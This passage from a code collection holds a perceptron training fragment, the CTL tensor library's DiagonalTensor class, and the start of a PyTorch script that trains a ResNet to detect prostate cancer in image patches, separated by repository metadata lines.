for j,out in enumerate(output_arr):
y_in=0## sum
for i,inp in enumerate(input_arr):
y_in+=inp*w_array[i][j]
y_in+=b_array[j]##bias
if(self.input_type=="binary"):##activation
y=self.activation_func_bin(y_in,th)
elif(self.input_type=="bipolar"):
y=self.activation_func(y_in,th)
if(y!=out):
if self.perceptron_rule == "default":
self.default_rule(input_arr,out,w_array,b_array,n,j)
if self.perceptron_rule == "delta":
self.delta_rule(input_arr,out,w_array,b_array,n,j,y)
def Perceptron(self,learning_rate,epoch,threshold,bias):
iter=0
self.create_weight_and_bias_array(self.layers[0],self.layers[1],bias)#give input and output layer as arguments
acc=[]
while iter!=epoch:
for i in range(self.input_number):
self.Feed_Forward_Perceptron(self.input_arr[i],self.output_arr[i],learning_rate,threshold)
iter+=1
            if(iter%1==0):##report progress every epoch (increase the modulus to report less often)
                print("epoch="+str(iter))
accuracy=self.predict(self.input_arr,self.output_arr,map_prediction=False)
acc.append(accuracy)
return acc
#print("!!!Weights Matrix After Training!!!"+str(self.input_length)+"X"+str(self.output_length))
#print(self.Connections_Weight[0])
def train(self,learning_rate,epoch,bias,threshold):#return accuracy value of each epoch
if self.method=="perceptron":
acc=self.Perceptron(learning_rate,epoch,threshold,bias)
return acc
    def predict_per_once(self,input,output):##predict a single input
w_array=self.Connections_Weight[0]
b_array=self.Connections_Bias[0]
pred_result=np.zeros(shape=(self.output_length),dtype=np.float64)
for j,out in enumerate(output):
y_in=0.0
for i,inp in enumerate(input):
y_in+=inp*w_array[i][j]
y_in+=b_array[j]
pred_result[j]=int(y_in)
return pred_result
    def Map_Pred_Matrix(self,results):##print a confusion matrix: predicted class as rows, real class as columns
print("""!!!!!!!!Results Of Prediction Of Given Inputs!!!!!!!!""")
sep=" | "
Letters=["L","A","B","C","D","E","J","K"]
l=sep.join(map(str,Letters))
print("\t"+l)
for i,row in enumerate(results):
print("\t-----------------------------")
x=sep.join(map(str,row))
print("\t"+Letters[i+1]+" | "+x)
    def predict(self,inputs,labels,map_prediction):##predict a batch of inputs given as an array
true_result=0
false_result=0
results=[[0 for x in range(self.output_length)] for x in range(self.output_length)]
for i,input in enumerate(inputs):
pred_result=self.predict_per_once(input,labels[i])
pred_class=np.argmax(pred_result)##return index of max value as predicted class
real_class=np.where(labels[i]==1)[0][0]
results[pred_class][real_class]+=1
if pred_class==real_class:
true_result+=1
else:
false_result+=1
if(map_prediction==True):
self.Map_Pred_Matrix(results)
accuracy=float(true_result) / float(true_result+false_result)
print("accuracy=>"+str(accuracy))
return accuracy
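
# A minimal sketch of training with this class (layer sizes and data shapes
# are illustrative; inputs and labels must be numpy arrays):
#
#     model = Model(method="perceptron", input_type="bipolar", perceptron_rule="default")
#     model.add_layer(layer("in", "input", 63))
#     model.add_layer(layer("out", "output", 7))
#     model.set_input_values(inputs, input_number=21, input_length=63)
#     model.set_output_values(labels, output_length=7)
#     history = model.train(learning_rate=1.0, epoch=10, bias=0.0, threshold=0.0)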
| 3.203125
| 3
|
src/CTL/tensor/diagonalTensor.py
|
CaoRX/CTL
| 11
|
12782901
|
import CTL.funcs.xplib as xplib
from CTL.tensorbase.tensorbase import TensorBase
import CTL.funcs.funcs as funcs
# import numpy as np
from copy import deepcopy
from CTL.tensor.leg import Leg
from CTL.tensor.tensor import Tensor
import warnings
class DiagonalTensor(Tensor):
"""
The class for diagonal tensors, inheriting from Tensor
1. A data tensor as 1D-array: the elements on the main diagonal;
2. A set of legs, corresponding to each dimension of the tensor.
    3. Other information (degree of freedom, total element number, ...)
    Diagonal tensors have non-zero elements only on the main diagonal, e.g., for a 3-dimensional diagonal tensor A only A_{iii} can be non-zero, while A_{123} must be zero.
This class is also used for DiagonalTensorLike, an object that behaves almost the same as DiagonalTensor, but without data.
In the following docstrings we will take the number of elements as $n$, the dimension as $d$, and then make some statements on the time efficiency for some functions.
    In the remaining docstrings we will not discuss Tensor and DiagonalTensor separately, except for special cases.
Parameters
----------
shape : None or tuple of int, optional
The expected shape of the tensor.
labels : None or tuple of str, optional
The labels to be put for each dimension, if None then automatically generated from lower case letters.
data : None or ndarray or 1D-array of float, optional
The data in the tensor.
        If None and the data is needed (not TensorLike), it is generated automatically; for DiagonalTensor the default diagonal is a vector of ones.
        If shape is given, data does not need to have the same shape as "shape", but the number of elements should be the same.
        If a 1D-array, it is taken as the diagonal elements and can be used for diagonal tensors of any rank.
degreeOfFreedom : None or int, optional
Local degree of freedom for this tensor.
name : None or str, optional
The name of the tensor to create.
legs : None or list of Leg, optional
The legs of this tensor. If None, then automatically generated.
diagonalFlag : bool, default False
        Whether this tensor is a diagonal tensor or not. Diagonal tensors allow more efficient tensor contractions, so they are handled by the child class DiagonalTensor; check the details in CTL.tensor.diagonalTensor.
tensorLikeFlag : bool, default False
If True, then the tensor is a "TensorLike": will not contain any data, but behave just like a tensor.
xp : object, default numpy
The numpy-like library for numeric functions.
Attributes
----------
tensorLikeFlag : bool
Whether the tensor is a "TensorLike".
xp : object
The numpy-like library for numeric functions.
diagonalFlag : bool
Whether the tensor is a "DiagonalTensor"
totalSize : int
Total number of components in this tensor.
degreeOfFreedom : int
Number of local degree of freedom. E.g. for Ising Tensor around one spin, it can be 1.
name : None or str
The name of the tensor.
legs : list of Leg
The legs from this tensor, can be "attracted" to another leg to form a bond. If not so, then it is a free leg.
a : ndarray of float
The data of the tensor.
Notes
-----
    Please note shape, labels, data and legs: although they are all optional, they need to contain enough (and not contradictory) information to deduce the shape, labels, data and legs of the tensor; the deduction strategy is described below:
For labels: priority is legs = labels, default: auto-generated in order from lowercase letters.
For shape: priority is legs = shape > data.
For legs: priority is legs, default: auto-generated with labels and shape.
For data: priority is data.reshape(shape), default: xplib.xp.random.random_sample(shape).
("For property A, priority is B > C = D > E, default: F" means, A can be deduced from B, C, D, E, so we consider from high priority to low priority. If B exist, then we take the deduced value from B, and change C, D, E if they in some sense compatible with B. Otherwise consider C & D. For values of the same priority, if both of them are provided, then they should be the same. If none of B, C, D, E can deduce A, then generate A with F.)
"checkXXXYYYCompatible" functions will do the above checkings to make the information in the same priority compatible with each other.
"""
def deduceDimension(self, data, labels):
"""
Deduce the dimension of current diagonal tensor from data and labels.
Parameters
----------
data : None or 1D array or ndarray
The data to be put in the diagonal tensor.
labels : None or list of Leg
The labels to be added to the legs of this tensor.
Returns
-------
int
The dimension of the current tensor.
"""
        # if labels are given, use them
        # otherwise, if data is given (as an ndarray), return len(data.shape)
        # otherwise, raise an error
if (data is not None) and (len(data.shape) != 1) and (labels is not None) and ((len(labels) != len(data.shape)) or (len(labels) == 0 and len(data.shape) == 1)):
raise ValueError(funcs.errorMessage(location = "DiagonalTensor.deduceDimension", err = "data {} and labels {} are not compatible.".format(data, labels)))
# what if len(labels) == 0, len(data.shape) == 1?
if (labels is not None):
return len(labels)
elif (data is not None):
# then data must be an numpy array
return len(data.shape)
else:
raise ValueError(funcs.errorMessage(location = "DiagonalTensor.deduceDimension", err = "both data and labels are None."))
    # TODO: add the effect of "legs" to the deduction
    # the strategy is almost the same as for Tensor
    # the only difference: when shape is a single integer and the dimension is known, we can build the real shape by repeating it dim times
# deduce strategy:
# we want length and dim
# priority for length: shape > data
# priority for dim: shape > labels > data
# 0. leg exist: the shape is already done
# check if shape of leg is ok for diagonal tensor
# if shape exist: check if shape is ok with shape of leg(integer / tuple)
# if label exist: check if dimension of labels ok with legs
# if data exist: ...
# 1. shape exist: shape can be either an integer, or a n-element tuple
# for int case: deduce dim from labels, then data
# for tuple case: (length, data) is ready
# then check labels: should be either None or len(labels) == dim
# then check data: either None, length-element array, dim-dimensional tensor
# 2. shape not exist: check labels for dim
# then check data for dim(1d array, dim-d array with all equal shapes)
# and generate l from shape of data
# 3. labels not exist: check data for (dim, length)
def checkLegsDiagonalCompatible(self, legs):
"""
        Check whether the shape from legs can form a diagonal tensor, i.e., all indices have the same dimension.
Parameters
----------
legs : list of Leg
Legs of the tensor that already existed before creating the tensor.
Returns
-------
bool
Whether the legs can form a diagonal tensor.
"""
if (len(legs) == 0):
return True
l = legs[0].dim
for leg in legs:
if (leg.dim != l):
return False
return True
def checkShapeDiagonalCompatible(self, shape):
"""
        Check whether the shape can form a diagonal tensor, i.e., all indices have the same dimension.
Parameters
----------
shape : tuple of int
Shape of the tensor that already existed before creating the tensor.
Returns
-------
bool
Whether the legs can form a diagonal tensor.
"""
if (len(shape) == 0):
return True
l = shape[0]
for dim in shape:
if (dim != l):
return False
return True
def checkLegsShapeCompatible(self, legs, shape):
"""
For information, check Tensor.checkLegsShapeCompatible.
"""
if (shape is None):
return True
if (isinstance(shape, int)):
shape = tuple([shape] * len(legs))
if (isinstance(shape, list) or isinstance(shape, tuple)):
shapeList = list(shape)
if (len(shapeList) != len(legs)):
return False
for dim, leg in zip(shapeList, legs):
if (dim != leg.dim):
return False
return True
else:
return False
def checkShapeDataCompatible(self, shape, data):
"""
For information, check Tensor.checkShapeDataCompatible.
"""
# we know shape, and want to see if data is ok
if (data is None):
return True
if (isinstance(shape, int)):
shape = tuple([shape] * len(data.shape))
return ((len(data.shape) == 1) and (len(shape) > 0) and (len(data) == shape[0])) or (funcs.tupleProduct(data.shape) == funcs.tupleProduct(shape))
def generateData(self, shape, data, isTensorLike):
"""
For information, check Tensor.generateData.
Returns
-------
1D-array of float
The data to be saved in this diagonal tensor.
"""
if (isTensorLike):
return None
# print('generating data for data = {}'.format(data))
if (data is None):
data = xplib.xp.ones(shape[0])
# otherwise, data can be 1D-array, or ndarray
elif (len(data.shape) == 1):
data = xplib.xp.copy(data)
else:
l, dim = len(shape), shape[0]
# print('dim = {}, l = {}'.format(dim, l))
# print(xplib.xp.diag_indices(dim, l))
data = xplib.xp.copy(data[xplib.xp.diag_indices(dim, l)])
return data
def deduction(self, legs, data, labels, shape, isTensorLike = False):
"""
For more information, check Tensor.deduction
"""
# in Tensor: the "shape" has the highest priority
# so if the shape is given here, it should be taken
# however, if the shape is given as an integer: then we need to deduce the dimension
# if shape exist: then according to shape(but dim may be deduced)
# otherwise, if labels exist, then dim from labels, and l from data
# otherwise, both dim and l from data
funcName = "DiagonalTensor.deduction"
# first, consider scalar case
if (legs is None) and (labels is None) and (shape == () or ((data is not None) and (data.shape == ()))):
if (data is None) and (not isTensorLike):
data = xplib.xp.array(1.0)
return [], data, [], () # scalar
if (legs is not None):
if (not self.checkLegsDiagonalCompatible(legs = legs)):
raise ValueError(funcs.errorMessage('legs {} cannot be considered as legs for diagonal tensor.'.format(legs), location = funcName))
if (not self.checkLegsLabelsCompatible(legs = legs, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with legs {}'.format(labels, legs), location = funcName))
if (labels is None):
labels = [leg.name for leg in legs]
if (not self.checkLegsShapeCompatible(legs = legs, shape = shape)):
raise ValueError(funcs.errorMessage('shape {} is not compatible with legs {}'.format(shape, legs), location = funcName))
if (shape is None) or (isinstance(shape, int)):
shape = tuple([leg.dim for leg in legs])
if (not self.checkShapeDataCompatible(shape = shape, data = data)):
raise ValueError(funcs.errorMessage('data shape {} is not compatible with required shape {}'.format(data.shape, shape), location = funcName))
elif (shape is not None):
if (isinstance(shape, int)):
dim = self.deduceDimension(data = data, labels = labels)
shape = tuple([shape] * dim)
if (not self.checkShapeDiagonalCompatible(shape = shape)):
raise ValueError(funcs.errorMessage('shape {} cannot be considered as shape for diagonal tensor.'.format(shape), location = funcName))
if (not self.checkShapeLabelsCompatible(shape = shape, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with required shape {}'.format(labels, shape), location = funcName))
if (labels is None):
labels = self.generateLabels(len(shape))
if (not self.checkShapeDataCompatible(shape = shape, data = data)):
raise ValueError(funcs.errorMessage('data shape {} is not compatible with required shape {}'.format(data.shape, shape), location = funcName))
elif (data is not None):
# legs, shape are both None
shape = data.shape
if (not self.checkShapeDiagonalCompatible(shape = shape)):
raise ValueError(funcs.errorMessage('data shape {} cannot be considered as shape for diagonal tensor.'.format(shape), location = funcName))
dim = self.deduceDimension(data = data, labels = labels)
if (len(shape) == 1) and (dim > 1):
shape = tuple([shape[0]] * dim)
if (not self.checkShapeLabelsCompatible(shape = shape, labels = labels)):
raise ValueError(funcs.errorMessage('labels {} is not compatible with required shape {}'.format(labels, shape), location = funcName))
if (labels is None):
labels = self.generateLabels(len(shape))
else:
raise ValueError(funcs.errorMessage("Tensor() cannot accept parameters where legs, shape and data being None simultaneously.", location = funcName))
# elif (shape is not None):
# if (isinstance(shape, int)):
# dim = self.deduceDimension(data, labels)
# l = shape
# else:
# dim = len(shape)
# if (dim == 0) or (not funcs.checkAllEqual(shape)):
# raise ValueError(funcs.errorMessage(location = funcName, err = "shape {} is not valid.".format(shape)))
# l = shape[0]
# # then we need to deduce dimension
# if (labels is not None) and (len(labels) != dim):
# raise ValueError(funcs.errorMessage(location = funcName, err = "number of labels is not the same as dim: {} expected but {} obtained.".format(dim, len(labels))))
# elif (data is not None):
# # data can be either shape, or an array of l
# if (len(data.shape) == 1):
# if (data.shape[0] != l):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data length is not the same as length deduced from shape: {} expected but {} obtained.".format(l, data.shape[0])))
# elif (len(data.shape) != dim) or (data.shape != tuple([l] * dim)):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data shape is not correct: {} expected but {} obtained.".format(tuple([l] * dim), data.shape)))
# # shape is None, how to deduce shape?
# elif (labels is not None):
# dim = len(labels)
# if (data is None):
# raise ValueError(funcs.errorMessage(location = funcName, err = "cannot deduce data shape since data and shape are both None."))
# elif (len(data.shape) == 1):
# l = len(data)
# elif not funcs.checkAllEqual(data.shape):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data.shape {} is not valid.".format(data.shape)))
# else:
# if (len(data.shape) != dim):
# raise ValueError(funcs.errorMessage(location = funcName, err = "dimension of data is not compatible with dimension deduced from labels: expect {} but {} is given.".format(dim, len(data.shape))))
# l = data.shape[0]
# else:
# # deduce from data.shape
# if (data is None):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data, labes and shape are all None."))
# elif not funcs.checkAllEqual(data.shape):
# raise ValueError(funcs.errorMessage(location = funcName, err = "data.shape {} is not valid.".format(data.shape)))
# else:
# dim = len(data.shape)
# l = data.shape[0]
# print('l = {}, dim = {}'.format(l, dim))
# shape = tuple([l] * dim)
data = self.generateData(shape = shape, data = data, isTensorLike = isTensorLike)
# if (tensorLikeFlag):
# data = None
# elif (data is None):
# # default is identity
# data = xplib.xp.ones(l)
# elif (len(data.shape) == 1):
# data = xplib.xp.copy(data)
# else:
# data = xplib.xp.array([data[tuple([x] * dim)] for x in range(l)])
# must be a copy of original "data" if exist
# if (labels is None):
# labels = self.generateLabels(dim)
if (legs is None):
legs = []
for label, dim in zip(labels, list(shape)):
legs.append(Leg(self, dim, label))
else:
for leg in legs:
leg.tensor = self
return legs, data, labels, shape
def __init__(self, shape = None, labels = None, data = None, degreeOfFreedom = None, name = None, legs = None, tensorLikeFlag = False, dtype = xplib.xp.float64):
super().__init__(diagonalFlag = True, tensorLikeFlag = tensorLikeFlag, dtype = dtype)
legs, data, labels, shape = self.deduction(legs = legs, data = data, labels = labels, shape = shape, isTensorLike = tensorLikeFlag)
self.a = data
self.legs = legs
# self.totalSize = funcs.tupleProduct(shape)
# functions of Tensor from here
self.degreeOfFreedom = degreeOfFreedom
self.name = name
# self._dim = len(shape)
if shape == ():
self._length = 1
else:
self._length = shape[0]
@property
def dim(self):
return len(self.legs)
@property
def shape(self):
return tuple([self._length] * self.dim)
@property
def labels(self):
return [leg.name for leg in self.legs]
@property
def chi(self):
return self._length
def __str__(self):
if (self.tensorLikeFlag):
objectStr = 'DiagonalTensorLike'
else:
objectStr = 'DiagonalTensor'
if not (self.degreeOfFreedom is None):
dofStr = ', degree of freedom = {}'.format(self.degreeOfFreedom)
else:
dofStr = ''
if (self.name is not None):
nameStr = self.name + ', '
else:
nameStr = ''
return '{}({}shape = {}, labels = {}{})'.format(objectStr, nameStr, self.shape, self.labels, dofStr)
def __repr__(self):
if (self.tensorLikeFlag):
objectStr = 'DiagonalTensorLike'
else:
objectStr = 'DiagonalTensor'
if not (self.degreeOfFreedom is None):
dofStr = ', degree of freedom = {}'.format(self.degreeOfFreedom)
else:
dofStr = ''
if (self.name is not None):
nameStr = self.name + ', '
else:
nameStr = ''
return '{}({}shape = {}, labels = {}{})'.format(objectStr, nameStr, self.shape, self.labels, dofStr)
def __matmul__(self, b):
return contractTwoTensors(ta = self, tb = b)
def bondDimension(self):
"""
The bond dimension of the current diagonal tensor: it is the same over all dimensions.
Returns
-------
int
The dimension for each index.
"""
return self._length
def moveLegsToFront(self, legs):
"""
Change the orders of legs: move a given set of legs to the front while not modifying the relative order of other legs. Use xplib.xp.moveaxis to modify the data if this is not a TensorLike object.
        In fact this makes no difference for a diagonal tensor: for Tensor this function changes the order of the data indices, but for a diagonal tensor it is only a virtual reordering of the legs.
Parameters
----------
legs : list of Leg
The set of legs to be put at front.
"""
moveFrom = []
moveTo = []
currIdx = 0
movedLegs = legs
for currLeg in legs:
for i, leg in enumerate(self.legs):
if (leg == currLeg):
moveFrom.append(i)
moveTo.append(currIdx)
currIdx += 1
break
for leg in movedLegs:
self.legs.remove(leg)
# print(moveFrom, moveTo)
# print(labelList)
# print(self.labels)
self.legs = movedLegs + self.legs
# self.a = xplib.xp.moveaxis(self.a, moveFrom, moveTo)
def toVector(self):
"""
Deprecated
Make a vector according to the diagonal elements.
        Deprecated since this behavior differs from Tensor, which returns the flattened ndarray data. Returning the full ndarray is usually useless for a diagonal tensor and may waste CPU time.
To obtain the data, DiagonalTensor.a is enough.
Returns
-------
1D ndarray of float
A vector contains diagonal elements of the diagonal tensor.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to vector since no data contained.', 'DiagonalTensor.toVector')
funcs.deprecatedFuncWarning(funcName = "DiagonalTensor.toVector", deprecateMessage = "This will return a vector corresponding to the diagonal of tensor instead of the complete tensor.")
return xplib.xp.copy(xplib.xp.ravel(self.a))
def toMatrix(self, rows, cols):
"""
Deprecated
Make a matrix of the data of this diagonal tensor, given the labels or legs of rows and cols.
        Deprecated since this function is time-consuming (O(n^d)), and in most cases there are much better ways to use the data than materializing a matrix. For details, see CTL.tensor.contract for more information.
Parameters
----------
        rows : None or list of str or list of Leg
            The legs for the rows of the matrix. If None, deduced from cols.
        cols : None or list of str or list of Leg
            The legs for the cols of the matrix. If None, deduced from rows.
Returns
-------
2D ndarray of float
The data of this tensor, in the form of (rows, cols).
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to matrix since no data contained.', 'DiagonalTensor.toMatrix')
# print(rows, cols)
# print(self.labels)
# input two set of legs
funcs.deprecatedFuncWarning(funcName = "DiagonalTensor.toMatrix", deprecateMessage = "Diagonal tensors should be used in a better way for linear algebra calculation rather than be made into a matrix.")
assert not ((rows is None) and (cols is None)), "Error in Tensor.toMatrix: toMatrix must have at least row or col exist."
if (rows is not None) and (isinstance(rows[0], str)):
rows = [self.getLeg(label) for label in rows]
if (cols is not None) and (isinstance(cols[0], str)):
cols = [self.getLeg(label) for label in cols]
if (cols is None):
cols = funcs.listDifference(self.legs, rows)
if (rows is None):
rows = funcs.listDifference(self.legs, cols)
assert (funcs.compareLists(rows + cols, self.legs)), "Error Tensor.toMatrix: rows + cols must contain(and only contain) all legs of tensor."
colIndices = self.getLegIndices(cols)
rowIndices = self.getLegIndices(rows)
colShape = tuple([self.shape[x] for x in colIndices])
rowShape = tuple([self.shape[x] for x in rowIndices])
colTotalSize = funcs.tupleProduct(colShape)
rowTotalSize = funcs.tupleProduct(rowShape)
data = funcs.diagonalNDTensor(self.a, self.dim)
data = xplib.xp.reshape(data, (rowTotalSize, colTotalSize))
return data
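# Illustrative sketch (comments only; not part of the library API): what
# toMatrix conceptually builds. funcs.diagonalNDTensor is assumed to embed
# the 1-D diagonal data into a d-dimensional hypercube; for d = 2 the plain
# NumPy equivalent would be:
#
#     import numpy as np
#     a = np.array([1.0, 2.0, 3.0])              # diagonal data, length l = 3
#     dense = np.zeros((3, 3))
#     dense[np.arange(3), np.arange(3)] = a      # same as np.diag(a)
#     matrix = dense.reshape(3, 3)               # (rowTotalSize, colTotalSize)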
def copy(self):
"""
Make a copy of the current diagonal tensor, without copying the legs. For more information, refer to Tensor.copy.
Returns
-------
DiagonalTensor
A copy of the current diagonal tensor, all the information can be copied is contained.
"""
return DiagonalTensor(data = self.a, shape = self.shape, degreeOfFreedom = self.degreeOfFreedom, name = self.name, labels = self.labels, tensorLikeFlag = self.tensorLikeFlag)
# no copy of tensor legs, which may contain connection information
def toTensorLike(self):
"""
Make a copy of the current tensor without copying the legs. This works almost like self.copy(), except that the data are not copied either.
Returns
-------
DiagonalTensor
A DiagonalTensorLike of the current tensor, containing all copyable information except the legs and the data.
"""
if (self.tensorLikeFlag):
return self.copy()
else:
return DiagonalTensor(data = None, degreeOfFreedom = self.degreeOfFreedom, name = self.name, labels = self.labels, shape = self.shape, tensorLikeFlag = True)
def moveLabelsToFront(self, labelList):
"""
Change the order of the legs: move the legs with the given labels to the front. For details, see "self.moveLegsToFront".
Parameters
----------
labelList : list of str
The set of labels to be put at front.
"""
legs = self.getLegsByLabel(labelList)
self.moveLegsToFront(legs)
# legs = [self.getLeg(label) for label in labelList]
# self.moveLegsToFront(legs)
# moveFrom = []
# moveTo = []
# currIdx = 0
# movedLegs = []
# for label in labelList:
# for i, leg in enumerate(self.legs):
# if (leg.name == label):
# moveFrom.append(i)
# moveTo.append(currIdx)
# currIdx += 1
# movedLegs.append(leg)
# break
# for leg in movedLegs:
# self.legs.remove(leg)
# self.legs = movedLegs + self.legs
# self.a = xplib.xp.moveaxis(self.a, moveFrom, moveTo)
def outProduct(self, labelList, newLabel):
"""
Deprecated
Comment
-------
The outer product would destroy the diagonal structure: several legs of a full diagonal tensor cannot easily be combined, so a TypeError is raised.
"""
raise TypeError(funcs.errorMessage(location = "DiagonalTensor.outProduct", err = "DiagonalTensor cannot perform outProduct, since the diagonal nature will be destroyed."))
def norm(self):
"""
Norm of the current tensor. O(n).
Returns
-------
float
The norm of data.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike do not have norm since no data contained.', 'DiagonalTensor.norm')
return xplib.xp.linalg.norm(self.a)
def trace(self, rows = None, cols = None):
"""
Trace of the current diagonal tensor. To preserve the diagonal property, this function can only compute the global trace over the main diagonal.
Parameters
----------
rows, cols: None
Only set to be compatible with the usage for Tensor
Returns
-------
float
The trace of the matrix generated by given cols and rows.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike do not have trace since no data contained.', 'DiagonalTensor.trace')
return xplib.xp.sum(self.a)
def single(self):
"""
Generate a single value from a tensor.
Note the difference from Tensor.single(): in a Tensor object the data are saved as an ndarray, so a single value must be a 0-d array, in other words a single number.
For a DiagonalTensor, however, the data are always saved as a 1-D array, so we first decide whether it can be converted to a single number, and then return the element at the lowest index.
Returns
-------
float
A single value of this tensor.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to single value since no data contained.', 'DiagonalTensor.single')
assert self._length == 1, "Error: cannot get single value from diagTensor whose length is not (1,)."
assert self.shape == (), "Error: cannot get single value from tensor whose shape is not ()."
return self.a[()]
def toTensor(self, labels = None):
"""
Return an ndarray of this tensor. Since the current object only stores the main diagonal, the full tensor may be much larger, so this is not recommended and is not used by any internal function.
Parameters
----------
labels : None or list of str
    The order of labels for the output tensor. Note that if labels is None, the order of legs is not fixed and may differ from call to call.
Returns
-------
ndarray of float
The data of the tensor, order of legs are given by the labels.
"""
assert (not self.tensorLikeFlag), funcs.errorMessage('DiagonalTensorLike cannot be transferred to tensor since no data contained.', 'DiagonalTensor.toTensor')
if (labels is not None):
self.reArrange(labels)
return funcs.diagonalNDTensor(self.a, self.dim)
def sumOutLeg(self, leg, weights = None):
"""
Sum out one leg to make a (D - 1)-dimensional tensor. Gives a warning (and does nothing) if the leg does not belong to the current tensor, and gives a warning if the leg is connected to some bond (i.e. not free).
Parameters
----------
leg : Leg
The leg to be summed out.
weights : 1-d array, optional
If not None, then each index on given dimension will be weighted by weights[i].
"""
if not (leg in self.legs):
warnings.warn(funcs.warningMessage("leg {} is not in tensor {}, do nothing.".format(leg, self), location = 'Tensor.sumOutLeg'), RuntimeWarning)
return
if leg.bond is not None:
warnings.warn(funcs.warningMessage("leg {} to be summed out is connected to bond {}.".format(leg, leg.bond), location = 'Tensor.sumOutLeg'), RuntimeWarning)
idx = self.legs.index(leg)
# self.a = xplib.xp.sum(self.a, axis = idx)
self.legs = self.legs[:idx] + self.legs[(idx + 1):]
# if weights is None:
if (len(self.legs) == 0):
# not a diagonal tensor, since the last sum will give a single value
if weights is None:
self.a = xplib.xp.array(xplib.xp.sum(self.a))
else:
self.a = xplib.xp.array(xplib.xp.sum(self.a * weights))
self._length = 1
else:
if (weights is not None):
self.a = self.a * weights
def typeName(self):
"""
The type of the current class.
Returns
-------
{"DiagonalTensor", "DiagonalTensorLike"}
"""
if (self.tensorLikeFlag):
return "DiagonalTensorLike"
else:
return "DiagonalTensor"
from CTL.tensor.contract.contract import contractTwoTensors
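# Hedged usage sketch (added for illustration; not part of the original module).
# The constructor keywords below are inferred from DiagonalTensor.copy() above
# and may not match every version of the library.
def _diagonal_tensor_demo():
    import numpy as np
    t = DiagonalTensor(data=np.array([1.0, 2.0, 3.0]), shape=(3, 3), labels=['a', 'b'])
    # trace() sums the diagonal, norm() is the 2-norm of the diagonal data
    return t.trace(), t.norm()  # expected: 6.0 and sqrt(14)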
| 2.859375
| 3
|
training_codes/train_prostate_cnn_Resnet_pretrained_SEER.py
|
SBU-BMI/quip_prad_cancer_detection
| 1
|
12782902
|
import argparse
import copy
import glob
import time, os, sys
from time import strftime
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from torch.utils.data import DataLoader, Dataset
from torchvision import transforms, models
from sklearn.metrics import mean_squared_error, accuracy_score, hamming_loss, roc_curve, auc, f1_score, confusion_matrix
import pdb
from prostate_utils import *  # may re-export some names above; explicit imports added so the script stands alone
parser = argparse.ArgumentParser(description='PyTorch Prostate Cancer Detection Training')
parser.add_argument('--lr', default=1e-2, type=float, help='learning rate')
parser.add_argument('--net_type', default='RESNET_34_prostate_trueVal_', type=str, help='model')
parser.add_argument('--net_depth', default=34, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float, help='weight decay')
parser.add_argument('--finetune', '-f', action='store_true', help='Fine tune pretrained model')
parser.add_argument('--batch_size', default=256, type=int)
parser.add_argument('--num_workers', default=8, type=int)
parser.add_argument('--num_epochs', default=100, type=int, help='Number of epochs in training')
parser.add_argument('--lr_decay_epoch', default=10, type = int)
parser.add_argument('--max_lr_decay', default = 60, type = int)
parser.add_argument('--APS', default = 175, type = int)
parser.add_argument('--N_subimgs', default = 5, type = int)
parser.add_argument('--N_limit', default = 100000, type = int)
parser.add_argument('--check_after', default=2,
type=int, help='check the network after check_after epoch')
parser.add_argument('--note', type=str, default='none', help="note while running the code")
args = parser.parse_args()
with open(os.path.basename(__file__)) as f:
codes = f.readlines()
print('\n\n' + '=' * 20 + os.path.basename(__file__) + '=' * 20)
for c in codes:
print(c[:-1])
with open('prostate_utils.py') as f:
codes = f.readlines()
print('\n\n' + '=' * 20 + 'prostate_utils.py' + '=' * 20)
for c in codes:
print(c[:-1])
print(args)
rand_seed = 26700
if rand_seed is not None:
np.random.seed(rand_seed)
torch.manual_seed(rand_seed)
torch.cuda.manual_seed(rand_seed)
use_gpu = torch.cuda.is_available()
print('Using GPU: ', use_gpu)
device = torch.device("cuda:0")
mean = [0.6462, 0.5070, 0.8055] # for Prostate cancer
std = [0.1381, 0.1674, 0.1358]
APS = args.APS # default = 448
input_size = 224
data_transforms = {
'train': transforms.Compose([ # 2 steps of data augmentation for training
transforms.RandomCrop(APS), # perform random crop manually in the dataloader
transforms.Resize(input_size),  # transforms.Scale is deprecated in favor of Resize
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ColorJitter(brightness=0.3, contrast=0.3, saturation=0.3, hue=0.1),
transforms.ToTensor(),
transforms.Normalize(mean, std)]),
'val': transforms.Compose([
transforms.Resize(input_size),
transforms.ToTensor(),
transforms.Normalize(mean, std)])
}
train_seer_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_seer'
train_beatrice_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_Beatrice_training'
val_fol = '/data10/shared/hanle/extract_prad_seer/patches_prad_Beatrice_validation'
img_trains = glob.glob(os.path.join(train_seer_fol, '*png')) + glob.glob(os.path.join(train_beatrice_fol, '*png'))
img_vals = glob.glob(os.path.join(val_fol, '*png'))
print('len of train/val set: ', len(img_trains), len(img_vals))
train_set = data_loader(img_trains, transform = data_transforms['train'])
train_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=args.num_workers)
val_set = data_loader(img_vals, transform = data_transforms['val'])
val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=args.num_workers)
def val_fn_epoch(val_fn = None, crit = None, val_loader = None):
nline = 0
running_loss = 0.0
labels_val = torch.zeros(0).type(torch.LongTensor)
preds_val = torch.zeros(0).type(torch.LongTensor).to(device)
with torch.no_grad():
for ix, batch in enumerate(val_loader):
if (len(val_loader.dataset) - nline) < 2: continue
inputs, targets = batch
labels_val = torch.cat((labels_val, targets.type(torch.LongTensor)))
inputs = Variable(inputs.to(device))
targets = Variable(targets.type(torch.LongTensor).to(device))
output = val_fn(inputs)
if type(output) == tuple:
output,_ = output
N = output.size(0)
